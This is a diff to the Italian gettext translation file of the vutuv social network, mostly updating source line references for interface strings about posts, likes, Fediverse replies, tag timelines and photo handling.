+#: lib/vutuv_web/components/post_components.ex:4575
 #, elixir-autogen, elixir-format
 msgid "Reply to a now-deleted post by %{handle}"
 msgstr "Risposta a un post di %{handle} ora eliminato"
 
-#: lib/vutuv_web/components/post_components.ex:4563
-#: lib/vutuv_web/components/post_components.ex:4592
+#: lib/vutuv_web/components/post_components.ex:4566
 #: lib/vutuv_web/components/post_components.ex:4595
+#: lib/vutuv_web/components/post_components.ex:4598
 #, elixir-autogen, elixir-format
 msgid "Replying to %{handle}"
 msgstr "In risposta a %{handle}"
@@ -2891,7 +2891,7 @@ msgid_plural "connections"
 msgstr[0] "collegamento"
 msgstr[1] "collegamenti"
 
-#: lib/vutuv_web/components/post_components.ex:6960
+#: lib/vutuv_web/components/post_components.ex:6963
 #, elixir-autogen, elixir-format
 msgid "people who aren't your connections"
 msgstr "persone che non sono Suoi collegamenti"
@@ -3158,7 +3158,7 @@ msgstr "Nudità, violenza o altri contenuti che non hanno posto su vutuv."
 msgid "Only visible to you"
 msgstr "Visibile solo a Lei"
 
-#: lib/vutuv_web/components/post_components.ex:4539
+#: lib/vutuv_web/components/post_components.ex:4542
 #, elixir-autogen, elixir-format
 msgid "Only you can see this post while a report about it is handled."
 msgstr "Solo Lei può vedere questo post finché la segnalazione è in corso."
@@ -3220,8 +3220,8 @@ msgstr "Lo rimuova. La segnalazione si chiude, senza altre domande."
 
 #: lib/vutuv_web/components/post_components.ex:1467
 #: lib/vutuv_web/components/post_components.ex:3419
-#: lib/vutuv_web/components/post_components.ex:3627
-#: lib/vutuv_web/components/post_components.ex:4769
+#: lib/vutuv_web/components/post_components.ex:3631
+#: lib/vutuv_web/components/post_components.ex:4772
 #: lib/vutuv_web/live/organization_live/show.ex:684
 #: lib/vutuv_web/templates/user/show.html.heex:252
 #, elixir-autogen, elixir-format
@@ -3986,7 +3986,7 @@ msgstr "Membri più confermati"
 msgid "People %{name} follows"
 msgstr "Persone seguite da %{name}"
 
-#: lib/vutuv_web/agent_docs/post_doc.ex:244
+#: lib/vutuv_web/agent_docs/post_doc.ex:245
 #, elixir-autogen, elixir-format
 msgid "Post archive of %{name}"
 msgstr "Archivio dei post di %{name}"
@@ -4661,7 +4661,7 @@ msgstr "Non ha bloccato nessuno."
 msgid "You unblocked @%{slug}."
 msgstr "Ha sbloccato @%{slug}."
 
-#: lib/vutuv_web/live/post_live/feed.ex:3940
+#: lib/vutuv_web/live/post_live/feed.ex:3938
 #, elixir-autogen, elixir-format
 msgid "Discover people to follow"
 msgstr "Scopra persone da seguire"
@@ -5578,9 +5578,9 @@ msgstr "Navigazione principale"
 msgid "Footer navigation"
 msgstr "Navigazione a piè di pagina"
 
-#: lib/vutuv_web/components/post_components.ex:4849
-#: lib/vutuv_web/components/post_components.ex:5458
-#: lib/vutuv_web/components/post_components.ex:5796
+#: lib/vutuv_web/components/post_components.ex:4852
+#: lib/vutuv_web/components/post_components.ex:5461
+#: lib/vutuv_web/components/post_components.ex:5799
 #: lib/vutuv_web/live/notification_live/index.ex:1069
 #: lib/vutuv_web/views/user_html.ex:133
 #, elixir-autogen, elixir-format
@@ -5621,7 +5621,7 @@ msgstr "Tipo di indirizzo e-mail"
 msgid "Type of email address"
 msgstr "Tipo di indirizzo e-mail"
 
-#: lib/vutuv_web/live/press_kit_live.ex:628
+#: lib/vutuv_web/live/press_kit_live.ex:653
 #: lib/vutuv_web/templates/user/edit.html.heex:256
 #, elixir-autogen, elixir-format
 msgid "About you"
@@ -5950,7 +5950,7 @@ msgid "Name (A-Z)"
 msgstr "Nome (A-Z)"
 
 #: lib/vutuv_web/live/post_live/saved.ex:507
-#: lib/vutuv_web/live/tag_live/timeline.ex:453
+#: lib/vutuv_web/live/tag_live/timeline.ex:454
 #, elixir-autogen, elixir-format
 msgid "Newest first"
 msgstr "Prima i più recenti"
@@ -5977,7 +5977,7 @@ msgstr ""
 "Qui non c'è ancora nulla. Le persone a cui mette Mi piace compaiono qui."
 
 #: lib/vutuv_web/live/post_live/saved.ex:508
-#: lib/vutuv_web/live/tag_live/timeline.ex:454
+#: lib/vutuv_web/live/tag_live/timeline.ex:455
 #, elixir-autogen, elixir-format
 msgid "Oldest first"
 msgstr "Prima i meno recenti"
@@ -5999,7 +5999,7 @@ msgid "Search saved items"
 msgstr "Cerchi negli elementi salvati"
 
 #: lib/vutuv_web/live/post_live/saved.ex:570
-#: lib/vutuv_web/live/tag_live/timeline.ex:369
+#: lib/vutuv_web/live/tag_live/timeline.ex:370
 #, elixir-autogen, elixir-format
 msgid "Sort"
 msgstr "Ordina"
@@ -6402,7 +6402,7 @@ msgid "View all phone numbers"
 msgstr "Vedi tutti i numeri di telefono"
 
 #: lib/vutuv_web/live/feed_languages_live.ex:235
-#: lib/vutuv_web/live/press_kit_live.ex:979
+#: lib/vutuv_web/live/press_kit_live.ex:1004
 #: lib/vutuv_web/live/section_reorder_live.ex:128
 #, elixir-autogen, elixir-format
 msgid "Drag to reorder"
@@ -6417,7 +6417,7 @@ msgstr ""
 
 #: lib/vutuv_web/live/feed_languages_live.ex:267
 #: lib/vutuv_web/live/post_rewrites_live.ex:364
-#: lib/vutuv_web/live/press_kit_live.ex:1041
+#: lib/vutuv_web/live/press_kit_live.ex:1066
 #: lib/vutuv_web/live/section_reorder_live.ex:156
 #, elixir-autogen, elixir-format
 msgid "Move down"
@@ -6425,7 +6425,7 @@ msgstr "Sposta giù"
 
 #: lib/vutuv_web/live/feed_languages_live.ex:256
 #: lib/vutuv_web/live/post_rewrites_live.ex:352
-#: lib/vutuv_web/live/press_kit_live.ex:1030
+#: lib/vutuv_web/live/press_kit_live.ex:1055
 #: lib/vutuv_web/live/section_reorder_live.ex:147
 #, elixir-autogen, elixir-format
 msgid "Move up"
@@ -6821,8 +6821,8 @@ msgstr ""
 "risposte che La riguardano. Con entrambe disattivate, ad esempio:"
 
 #: lib/vutuv_web/components/post_components.ex:3346
-#: lib/vutuv_web/components/post_components.ex:4722
-#: lib/vutuv_web/components/post_components.ex:4736
+#: lib/vutuv_web/components/post_components.ex:4725
+#: lib/vutuv_web/components/post_components.ex:4739
 #: lib/vutuv_web/components/ui.ex:3226
 #: lib/vutuv_web/live/fediverse_account_live.ex:437
 #: lib/vutuv_web/live/organization_live/following.ex:385
@@ -6850,7 +6850,7 @@ msgstr "Nuovi messaggi e nuovi collegamenti"
 msgid "Remove this connection? You will stop following them."
 msgstr "Rimuovere questo collegamento? Smetterà di seguire questa persona."
 
-#: lib/vutuv_web/components/post_components.ex:4722
+#: lib/vutuv_web/components/post_components.ex:4725
 #: lib/vutuv_web/components/ui.ex:3225
 #: lib/vutuv_web/live/fediverse_account_live.ex:435
 #: lib/vutuv_web/live/organization_live/following.ex:385
@@ -7053,7 +7053,7 @@ msgid "Filter"
 msgstr "Filtro"
 
 #: lib/vutuv_web/live/admin/newsletter_group_live.ex:591
-#: lib/vutuv_web/live/tag_live/timeline.ex:335
+#: lib/vutuv_web/live/tag_live/timeline.ex:336
 #, elixir-autogen, elixir-format
 msgid "Filters"
 msgstr "Filtri"
@@ -7567,7 +7567,7 @@ msgid "applies to the whole list, not just this page"
 msgstr "vale per l'intero elenco, non solo per questa pagina"
 
 #: lib/vutuv_web/components/job_components.ex:190
-#: lib/vutuv_web/components/post_components.ex:7213
+#: lib/vutuv_web/components/post_components.ex:7189
 #: lib/vutuv_web/live/admin/newsletter_group_live.ex:980
 #: lib/vutuv_web/live/shell_live.ex:1830
 #, elixir-autogen, elixir-format
@@ -7677,9 +7677,9 @@ msgstr "Si aggiorna da sola. Può lasciare questa pagina: l'invio prosegue."
 #: lib/vutuv_web/components/welcome_components.ex:362
 #: lib/vutuv_web/live/admin/media_live.ex:270
 #: lib/vutuv_web/live/admin/newsletter_broadcast_live.ex:174
-#: lib/vutuv_web/live/post_live/feed.ex:4234
+#: lib/vutuv_web/live/post_live/feed.ex:4232
 #: lib/vutuv_web/live/post_rewrites_live.ex:447
-#: lib/vutuv_web/live/press_kit_live.ex:1056
+#: lib/vutuv_web/live/press_kit_live.ex:1081
 #, elixir-autogen
 msgid "Done"
 msgstr "Fatto"
@@ -8178,7 +8178,7 @@ msgstr "In attesa di verifica"
 #: lib/vutuv_web/live/admin/media_live.ex:146
 #: lib/vutuv_web/live/admin/user_live.ex:184
 #: lib/vutuv_web/live/job_board_live.ex:319
-#: lib/vutuv_web/live/tag_live/timeline.ex:399
+#: lib/vutuv_web/live/tag_live/timeline.ex:400
 #, elixir-autogen, elixir-format
 msgid "Clear filters"
 msgstr "Azzera i filtri"
@@ -9122,7 +9122,7 @@ msgstr ""
 msgid "CV download"
 msgstr "Download del CV"
 
-#: lib/vutuv_web/components/post_components.ex:6068
+#: lib/vutuv_web/components/post_components.ex:6071
 #, elixir-autogen, elixir-format
 msgid "Reposted by %{name} and %{formatted} other"
 msgid_plural "Reposted by %{name} and %{formatted} others"
@@ -12612,7 +12612,7 @@ msgid "Everyone (public)"
 msgstr "Tutti (pubblico)"
 
 #: lib/vutuv_web/live/job_posting_live/form.ex:681
-#: lib/vutuv_web/live/tag_live/timeline.ex:380
+#: lib/vutuv_web/live/tag_live/timeline.ex:381
 #: lib/vutuv_web/templates/education/form_content.html.heex:41
 #: lib/vutuv_web/templates/work_experience/form_content.html.heex:63
 #, elixir-autogen, elixir-format
@@ -13605,7 +13605,7 @@ msgid "Stop e-mail alerts for your saved search \"%{label}\"?"
 msgstr ""
 "Interrompere gli avvisi via e-mail per la Sua ricerca salvata \"%{label}\"?"
 
-#: lib/vutuv_web/components/post_components.ex:4077
+#: lib/vutuv_web/components/post_components.ex:4080
 #: lib/vutuv_web/components/saved_search_components.ex:43
 #: lib/vutuv_web/controllers/settings_controller.ex:788
 #: lib/vutuv_web/controllers/settings_controller.ex:806
@@ -14046,7 +14046,7 @@ msgstr "Inserisci nel testo"
 
 #: lib/vutuv_web/agent_docs/markdown.ex:259
 #: lib/vutuv_web/agent_docs/text.ex:221
-#: lib/vutuv_web/live/tag_live/timeline.ex:283
+#: lib/vutuv_web/live/tag_live/timeline.ex:284
 #, elixir-autogen, elixir-format
 msgid "Posts with this tag"
 msgstr "Post con questo tag"
@@ -14271,34 +14271,34 @@ msgstr ""
 msgid "added %{count} new entries to their CV:"
 msgstr "ha aggiunto %{count} nuove voci al proprio CV:"
 
-#: lib/vutuv_web/components/post_components.ex:6756
+#: lib/vutuv_web/components/post_components.ex:6759
 #, elixir-autogen, elixir-format
 msgid "Audiobook"
 msgstr "Audiolibro"
 
 #: lib/vutuv_web/agent_docs/markdown.ex:1390
-#: lib/vutuv_web/components/post_components.ex:6713
+#: lib/vutuv_web/components/post_components.ex:6716
 #, elixir-autogen, elixir-format
 msgid "Book review"
 msgstr "Recensione di un libro"
 
-#: lib/vutuv_web/components/post_components.ex:6757
+#: lib/vutuv_web/components/post_components.ex:6760
 #, elixir-autogen, elixir-format
 msgid "Cinema"
 msgstr "Cinema"
 
-#: lib/vutuv_web/components/post_components.ex:6759
+#: lib/vutuv_web/components/post_components.ex:6762
 #, elixir-autogen, elixir-format
 msgid "DVD/Blu-ray"
 msgstr "DVD/Blu-ray"
 
-#: lib/vutuv_web/components/post_components.ex:6755
+#: lib/vutuv_web/components/post_components.ex:6758
 #, elixir-autogen, elixir-format
 msgid "E-book"
 msgstr "E-book"
 
 #: lib/vutuv_web/agent_docs/markdown.ex:1390
-#: lib/vutuv_web/components/post_components.ex:6712
+#: lib/vutuv_web/components/post_components.ex:6715
 #, elixir-autogen, elixir-format
 msgid "Film review"
 msgstr "Recensione di un film"
@@ -14309,12 +14309,12 @@ msgstr "Recensione di un film"
 msgid "Look up"
 msgstr "Cerca"
 
-#: lib/vutuv_web/components/post_components.ex:6754
+#: lib/vutuv_web/components/post_components.ex:6757
 #, elixir-autogen, elixir-format
 msgid "Printed book"
 msgstr "Libro cartaceo"
 
-#: lib/vutuv_web/components/post_components.ex:6758
+#: lib/vutuv_web/components/post_components.ex:6761
 #, elixir-autogen, elixir-format
 msgid "Streaming"
 msgstr "Streaming"
@@ -14334,7 +14334,7 @@ msgstr "Streaming"
 msgid "Year"
 msgstr "Anno"
 
-#: lib/vutuv_web/components/post_components.ex:6795
+#: lib/vutuv_web/components/post_components.ex:6798
 #: lib/vutuv_web/views/job_reference_html.ex:180
 #, elixir-autogen, elixir-format
 msgid "%{formatted} page"
@@ -14342,30 +14342,30 @@ msgid_plural "%{formatted} pages"
 msgstr[0] "%{formatted} pagina"
 msgstr[1] "%{formatted} pagine"
 
-#: lib/vutuv_web/components/post_components.ex:6825
+#: lib/vutuv_web/components/post_components.ex:6828
 #: lib/vutuv_web/components/ui.ex:3884
 #, elixir-autogen, elixir-format
 msgid "%{hours} h"
 msgstr "%{hours} h"
 
-#: lib/vutuv_web/components/post_components.ex:6826
+#: lib/vutuv_web/components/post_components.ex:6829
 #: lib/vutuv_web/components/ui.ex:3885
 #, elixir-autogen, elixir-format
 msgid "%{hours} h %{minutes} min"
 msgstr "%{hours} h %{minutes} min"
 
-#: lib/vutuv_web/components/post_components.ex:6824
+#: lib/vutuv_web/components/post_components.ex:6827
 #: lib/vutuv_web/components/ui.ex:3877
 #, elixir-autogen, elixir-format
 msgid "%{minutes} min"
 msgstr "%{minutes} min"
 
-#: lib/vutuv_web/components/post_components.ex:6784
+#: lib/vutuv_web/components/post_components.ex:6787
 #, elixir-autogen, elixir-format
 msgid "(print edition)"
 msgstr "(edizione cartacea)"
 
-#: lib/vutuv_web/components/post_components.ex:6831
+#: lib/vutuv_web/components/post_components.ex:6834
 #, elixir-autogen, elixir-format
 msgid "approx. %{duration}"
 msgstr "circa %{duration}"
@@ -14397,7 +14397,7 @@ msgstr "Con certificazione:"
 msgid "With qualification: %{name}"
 msgstr "Con certificazione: %{name}"
 
-#: lib/vutuv_web/components/post_components.ex:6598
+#: lib/vutuv_web/components/post_components.ex:6601
 #, elixir-autogen, elixir-format
 msgid "Publisher:"
 msgstr "Editore:"
@@ -14440,7 +14440,7 @@ msgstr "ora La seguono."
 msgid "endorsed you for %{tags}."
 msgstr "L'ha confermata per %{tags}."
 
-#: lib/vutuv_web/components/post_components.ex:6589
+#: lib/vutuv_web/components/post_components.ex:6592
 #, elixir-autogen, elixir-format
 msgid "by:"
 msgstr "di:"
@@ -14817,14 +14817,14 @@ msgstr "Cerchi un account da bloccare"
 msgid "See all frozen accounts"
 msgstr "Vedi tutti gli account bloccati"
 
-#: lib/vutuv_web/components/post_components.ex:4366
+#: lib/vutuv_web/components/post_components.ex:4369
 #, elixir-autogen, elixir-format
 msgid "Show %{formatted} earlier post"
 msgid_plural "Show %{formatted} earlier posts"
 msgstr[0] "Mostra %{formatted} post precedente"
 msgstr[1] "Mostra %{formatted} post precedenti"
 
-#: lib/vutuv_web/components/post_components.ex:4389
+#: lib/vutuv_web/components/post_components.ex:4392
 #, elixir-autogen, elixir-format
 msgid "Show %{formatted} more reply"
 msgid_plural "Show %{formatted} more replies"
@@ -14853,7 +14853,7 @@ msgstr ""
 "Digiti un nome, un @handle o un indirizzo e-mail per trovare un account da "
 "bloccare."
 
-#: lib/vutuv_web/components/post_components.ex:7312
+#: lib/vutuv_web/components/post_components.ex:7288
 #, elixir-autogen, elixir-format
 msgid "You can't like your own post."
 msgstr "Non può mettere Mi piace al Suo stesso post."
@@ -15648,7 +15648,7 @@ msgstr "Inviamo lì un PIN per confermare che l'indirizzo è Suo."
 msgid "ZIP or postal code"
 msgstr "CAP"
 
-#: lib/vutuv_web/live/tag_live/timeline.ex:387
+#: lib/vutuv_web/live/tag_live/timeline.ex:388
 #: lib/vutuv_web/templates/education/form_content.html.heex:59
 #: lib/vutuv_web/templates/work_experience/form_content.html.heex:81
 #, elixir-autogen, elixir-format
@@ -16119,7 +16119,7 @@ msgstr ""
 " vedere dove va a finire. Modificare o eliminare un post su vutuv è solo una"
 " richiesta rivolta a quei server, e non tutti la rispettano."
 
-#: lib/vutuv_web/components/post_components.ex:7258
+#: lib/vutuv_web/components/post_components.ex:7234
 #: lib/vutuv_web/live/notification_live/index.ex:1592
 #, elixir-autogen, elixir-format
 msgid "%{formatted} reply"
@@ -16127,7 +16127,7 @@ msgid_plural "%{formatted} replies"
 msgstr[0] "%{formatted} risposta"
 msgstr[1] "%{formatted} risposte"
 
-#: lib/vutuv_web/components/post_components.ex:7262
+#: lib/vutuv_web/components/post_components.ex:7238
 #: lib/vutuv_web/live/notification_live/index.ex:1586
 #, elixir-autogen, elixir-format
 msgid "%{formatted} like"
@@ -16135,7 +16135,7 @@ msgid_plural "%{formatted} likes"
 msgstr[0] "%{formatted} Mi piace"
 msgstr[1] "%{formatted} Mi piace"
 
-#: lib/vutuv_web/components/post_components.ex:7266
+#: lib/vutuv_web/components/post_components.ex:7242
 #, elixir-autogen, elixir-format
 msgid "%{formatted} repost"
 msgid_plural "%{formatted} reposts"
@@ -16143,7 +16143,7 @@ msgstr[0] "%{formatted} ripubblicazione"
 msgstr[1] "%{formatted} ripubblicazioni"
 
 #: lib/vutuv_web/agent_docs/markdown.ex:1339
-#: lib/vutuv_web/components/post_components.ex:7217
+#: lib/vutuv_web/components/post_components.ex:7193
 #, elixir-autogen, elixir-format
 msgid "Already counted in the numbers above."
 msgstr "Già conteggiate nei numeri qui sopra."
@@ -16247,8 +16247,8 @@ msgstr "Questa risposta non spetta a Lei rimuoverla."
 #: lib/vutuv_web/agent_docs/markdown.ex:1539
 #: lib/vutuv_web/components/post_components.ex:1503
 #: lib/vutuv_web/components/post_components.ex:1734
-#: lib/vutuv_web/components/post_components.ex:3607
-#: lib/vutuv_web/components/post_components.ex:3935
+#: lib/vutuv_web/components/post_components.ex:3611
+#: lib/vutuv_web/components/post_components.ex:3938
 #: lib/vutuv_web/templates/remote_actor_card/card.html.heex:366
 #, elixir-autogen, elixir-format
 msgid "View the original"
@@ -16711,7 +16711,7 @@ msgstr ""
 #: lib/vutuv_web/live/admin/activity_live.ex:237
 #: lib/vutuv_web/live/admin/media_live.ex:155
 #: lib/vutuv_web/live/fediverse_following_live.ex:351
-#: lib/vutuv_web/live/tag_live/timeline.ex:478
+#: lib/vutuv_web/live/tag_live/timeline.ex:479
 #, elixir-autogen, elixir-format
 msgid "Nothing matches that. Try a shorter search, or clear the filters."
 msgstr ""
@@ -16943,22 +16943,22 @@ msgstr ""
 msgid "device or detail"
 msgstr "dispositivo o dettaglio"
 
-#: lib/vutuv_web/components/post_components.ex:4551
+#: lib/vutuv_web/components/post_components.ex:4554
 #, elixir-autogen, elixir-format
 msgid "Pinned post"
 msgstr "Post fissato"
 
-#: lib/vutuv_web/components/post_components.ex:4685
+#: lib/vutuv_web/components/post_components.ex:4688
 #, elixir-autogen, elixir-format
 msgid "Pin to profile"
 msgstr "Fissa sul profilo"
 
-#: lib/vutuv_web/components/post_components.ex:4693
+#: lib/vutuv_web/components/post_components.ex:4696
 #, elixir-autogen, elixir-format
 msgid "Unpin from profile"
 msgstr "Togli dal profilo"
 
-#: lib/vutuv_web/components/post_components.ex:4679
+#: lib/vutuv_web/components/post_components.ex:4682
 #, elixir-autogen, elixir-format
 msgid "Only one post can be pinned to your profile. Pin this one and release the other?"
 msgstr ""
@@ -17090,19 +17090,19 @@ msgstr "Foto successiva"
 msgid "No image description yet"
 msgstr "Ancora nessuna descrizione dell'immagine"
 
-#: lib/vutuv_web/components/post_components.ex:4130
+#: lib/vutuv_web/components/post_components.ex:4133
 #, elixir-autogen, elixir-format
 msgid "Open Fediverse settings"
 msgstr "Apri le impostazioni del Fediverso"
 
-#: lib/vutuv_web/components/post_components.ex:5634
-#: lib/vutuv_web/components/press_kit_components.ex:526
+#: lib/vutuv_web/components/post_components.ex:5637
+#: lib/vutuv_web/components/press_kit_components.ex:562
 #, elixir-autogen, elixir-format
 msgid "Photo %{n} of %{total}"
 msgstr "Foto %{n} di %{total}"
 
-#: lib/vutuv_web/components/post_components.ex:5862
-#: lib/vutuv_web/components/press_kit_components.ex:623
+#: lib/vutuv_web/components/post_components.ex:5865
+#: lib/vutuv_web/components/press_kit_components.ex:660
 #, elixir-autogen, elixir-format
 msgid "Photo is being checked"
 msgstr "La foto è in fase di controllo"
@@ -17115,7 +17115,7 @@ msgstr "Opzioni della foto"
 
 #: lib/vutuv_web/agent_docs/markdown.ex:1500
 #: lib/vutuv_web/agent_docs/text.ex:909
-#: lib/vutuv_web/components/post_components.ex:5944
+#: lib/vutuv_web/components/post_components.ex:5947
 #, elixir-autogen, elixir-format
 msgid "Photos:"
 msgstr "Foto:"
@@ -17143,7 +17143,7 @@ msgstr ""
 msgid "Show camera settings"
 msgstr "Mostra le impostazioni della fotocamera"
 
-#: lib/vutuv_web/components/post_components.ex:4183
+#: lib/vutuv_web/components/post_components.ex:4186
 #, elixir-autogen, elixir-format
 msgid "That server is blocked on this site, so no answer can be sent to it."
 msgstr ""
@@ -17169,7 +17169,7 @@ msgstr ""
 "Questa foto porta con sé il luogo in cui è stata scattata. Chiunque scarichi"
 " il file esatto può leggerlo."
 
-#: lib/vutuv_web/components/post_components.ex:4174
+#: lib/vutuv_web/components/post_components.ex:4177
 #, elixir-autogen, elixir-format
 msgid "This reply was sent to you alone, so it cannot be answered publicly."
 msgstr ""
@@ -17184,12 +17184,12 @@ msgstr ""
 "inviare le Sue parole a quella rete, cosa che vutuv fa solo per i membri che"
 " hanno attivato la partecipazione al Fediverso."
 
-#: lib/vutuv_web/components/post_components.ex:4192
+#: lib/vutuv_web/components/post_components.ex:4195
 #, elixir-autogen, elixir-format
 msgid "This site does not take part in the Fediverse."
 msgstr "Questo sito non partecipa al Fediverso."
 
-#: lib/vutuv_web/components/post_components.ex:4126
+#: lib/vutuv_web/components/post_components.ex:4129
 #, elixir-autogen, elixir-format
 msgid "Turn on Fediverse participation to answer"
 msgstr "Attivi la partecipazione al Fediverso per rispondere"
@@ -17205,7 +17205,7 @@ msgid "You have sent a lot of answers to other networks in the past hour. Please
 msgstr ""
 "Nell'ultima ora ha inviato molte risposte ad altre reti. Riprovi più tardi."
 
-#: lib/vutuv_web/components/post_components.ex:4187
+#: lib/vutuv_web/components/post_components.ex:4190
 #, elixir-autogen, elixir-format
 msgid "You moved your Fediverse account to another server, so answers are no longer sent from here."
 msgstr ""
@@ -17219,7 +17219,7 @@ msgstr ""
 "Al momento le Sue impostazioni del Fediverso non consentono di inviare una "
 "risposta."
 
-#: lib/vutuv_web/components/post_components.ex:4140
+#: lib/vutuv_web/components/post_components.ex:4143
 #, elixir-autogen, elixir-format
 msgid "Your answer goes to %{handle} on their own server and to your Fediverse followers. It is a public post on vutuv as well."
 msgstr ""
@@ -17302,13 +17302,13 @@ msgstr[1] ""
 "il file esatto lo rivela."
 
 #: lib/vutuv_web/agent_docs/markdown.ex:1357
-#: lib/vutuv_web/components/post_components.ex:7255
+#: lib/vutuv_web/components/post_components.ex:7231
 #, elixir-autogen, elixir-format
 msgid "%{handle} liked this"
 msgstr "A %{handle} è piaciuto"
 
 #: lib/vutuv_web/agent_docs/markdown.ex:1355
-#: lib/vutuv_web/components/post_components.ex:7252
+#: lib/vutuv_web/components/post_components.ex:7228
 #, elixir-autogen, elixir-format
 msgid "%{handle} shared this"
 msgstr "%{handle} lo ha condiviso"
@@ -17318,7 +17318,7 @@ msgstr "%{handle} lo ha condiviso"
 msgid "Fediverse reactions"
 msgstr "Reazioni dal Fediverso"
 
-#: lib/vutuv_web/components/post_components.ex:7139
+#: lib/vutuv_web/components/post_components.ex:7134
 #, elixir-autogen, elixir-format
 msgid "From other networks"
 msgstr "Da altre reti"
@@ -17716,7 +17716,7 @@ msgstr "Solo per i follower di questo account"
 msgid "Thank you. Our copy was deleted right away."
 msgstr "Grazie. La nostra copia è stata eliminata subito."
 
-#: lib/vutuv_web/components/post_components.ex:3934
+#: lib/vutuv_web/components/post_components.ex:3937
 #, elixir-autogen, elixir-format
 msgid "Vote on the original"
 msgstr "Vota sull'originale"
@@ -17747,7 +17747,7 @@ msgstr "Contenuti da altre reti rimossi dai membri"
 msgid "Hide"
 msgstr "Nascondi"
 
-#: lib/vutuv_web/components/post_components.ex:3875
+#: lib/vutuv_web/components/post_components.ex:3878
 #, elixir-autogen, elixir-format
 msgid "Marked as sensitive by its author"
 msgstr "Contrassegnato come sensibile dal suo autore"
@@ -17892,12 +17892,12 @@ msgstr "Coprila di nuovo"
 msgid "Sensitive. Show the picture."
 msgstr "Contenuto sensibile. Mostra l'immagine."
 
-#: lib/vutuv_web/components/post_components.ex:4033
+#: lib/vutuv_web/components/post_components.ex:4036
 #, elixir-autogen, elixir-format
 msgid "That is a lot of likes in one hour. Please try again later."
 msgstr "Sono molti Mi piace in un'ora. Riprovi più tardi."
 
-#: lib/vutuv_web/components/post_components.ex:4039
+#: lib/vutuv_web/components/post_components.ex:4042
 #, elixir-autogen, elixir-format
 msgid "That post is not here any more."
 msgstr "Quel post non è più qui."
@@ -17907,7 +17907,7 @@ msgstr "Quel post non è più qui."
 msgid "Back to the feed"
 msgstr "Torna al feed"
 
-#: lib/vutuv_web/components/post_components.ex:4178
+#: lib/vutuv_web/components/post_components.ex:4181
 #, elixir-autogen, elixir-format
 msgid "This post was published to that account's followers only, so it cannot be answered with a public post here."
 msgstr ""
@@ -18606,7 +18606,7 @@ msgstr "Ancora nulla da vutuv. Segua persone qui per riempire questa scheda."
 msgid "View the conversation"
 msgstr "Vedi la conversazione"
 
-#: lib/vutuv_web/live/tag_live/timeline.ex:286
+#: lib/vutuv_web/live/tag_live/timeline.ex:287
 #: lib/vutuv_web/templates/post/index.html.heex:18
 #, elixir-autogen, elixir-format
 msgid "%{formatted} post"
@@ -18614,32 +18614,32 @@ msgid_plural "%{formatted} posts"
 msgstr[0] "%{formatted} post"
 msgstr[1] "%{formatted} post"
 
-#: lib/vutuv_web/live/tag_live/timeline.ex:455
+#: lib/vutuv_web/live/tag_live/timeline.ex:456
 #, elixir-autogen, elixir-format
 msgid "Most liked"
 msgstr "Più apprezzati"
 
-#: lib/vutuv_web/live/tag_live/timeline.ex:486
+#: lib/vutuv_web/live/tag_live/timeline.ex:487
 #, elixir-autogen, elixir-format
 msgid "No posts carry this tag yet."
 msgstr "Nessun post porta ancora questo tag."
 
-#: lib/vutuv_web/live/tag_live/timeline.ex:484
+#: lib/vutuv_web/live/tag_live/timeline.ex:485
 #, elixir-autogen, elixir-format
 msgid "No posts from other networks carry this tag yet."
 msgstr "Nessun post da altre reti porta ancora questo tag."
 
-#: lib/vutuv_web/live/tag_live/timeline.ex:481
+#: lib/vutuv_web/live/tag_live/timeline.ex:482
 #, elixir-autogen, elixir-format
 msgid "No posts on vutuv carry this tag yet."
 msgstr "Nessun post su vutuv porta ancora questo tag."
 
-#: lib/vutuv_web/live/tag_live/timeline.ex:362
+#: lib/vutuv_web/live/tag_live/timeline.ex:363
 #, elixir-autogen, elixir-format
 msgid "word in a post"
 msgstr "parola in un post"
 
-#: lib/vutuv_web/components/post_components.ex:4036
+#: lib/vutuv_web/components/post_components.ex:4039
 #, elixir-autogen, elixir-format
 msgid "That reply is not here any more."
 msgstr "Quella risposta non è più qui."
@@ -18717,19 +18717,19 @@ msgstr ""
 msgid "Liked by"
 msgstr "Piace a"
 
-#: lib/vutuv_web/components/post_components.ex:6238
+#: lib/vutuv_web/components/post_components.ex:6241
 #, elixir-autogen, elixir-format
 msgid "Liked by %{name}"
 msgstr "Piace a %{name}"
 
-#: lib/vutuv_web/components/post_components.ex:6240
+#: lib/vutuv_web/components/post_components.ex:6243
 #, elixir-autogen, elixir-format
 msgid "Liked by %{name} and %{formatted} other"
 msgid_plural "Liked by %{name} and %{formatted} others"
 msgstr[0] "Piace a %{name} e a %{formatted} altro"
 msgstr[1] "Piace a %{name} e ad altri %{formatted}"
 
-#: lib/vutuv_web/components/post_components.ex:6251
+#: lib/vutuv_web/components/post_components.ex:6254
 #, elixir-autogen, elixir-format
 msgid "Only you see everyone here: some of these members are not named to other readers."
 msgstr ""
@@ -18910,7 +18910,7 @@ msgstr "Rilasciato il"
 msgid "Label"
 msgstr "Etichetta"
 
-#: lib/vutuv_web/live/post_live/feed.ex:3958
+#: lib/vutuv_web/live/post_live/feed.ex:3956
 #: lib/vutuv_web/live/reference_check_live.ex:169
 #, elixir-autogen, elixir-format
 msgid "Loading…"
@@ -20461,7 +20461,7 @@ msgstr ""
 msgid "Start over"
 msgstr "Ricomincia"
 
-#: lib/vutuv_web/components/post_components.ex:4066
+#: lib/vutuv_web/components/post_components.ex:4069
 #, elixir-autogen, elixir-format
 msgid "A like or a repost is sent back to the network this post came from, and your account does not take part in the Fediverse at the moment. You can switch it on in the {settings}."
 msgstr ""
@@ -21423,27 +21423,27 @@ msgstr "Lingua"
 msgid "The language this post is written in"
 msgstr "La lingua in cui è scritto questo post"
 
-#: lib/vutuv_web/components/post_components.ex:6132
+#: lib/vutuv_web/components/post_components.ex:6135
 #, elixir-autogen, elixir-format
 msgid "Show the original"
 msgstr "Mostra l'originale"
 
-#: lib/vutuv_web/components/post_components.ex:6168
+#: lib/vutuv_web/components/post_components.ex:6171
 #, elixir-autogen, elixir-format
 msgid "Translate"
 msgstr "Traduci"
 
-#: lib/vutuv_web/components/post_components.ex:6177
+#: lib/vutuv_web/components/post_components.ex:6180
 #, elixir-autogen, elixir-format
 msgid "Translated"
 msgstr "Tradotto"
 
-#: lib/vutuv_web/components/post_components.ex:6180
+#: lib/vutuv_web/components/post_components.ex:6183
 #, elixir-autogen, elixir-format
 msgid "Translated from %{language}"
 msgstr "Tradotto da %{language}"
 
-#: lib/vutuv_web/components/post_components.ex:6157
+#: lib/vutuv_web/components/post_components.ex:6160
 #, elixir-autogen, elixir-format
 msgid "Translating…"
 msgstr "Traduzione in corso…"
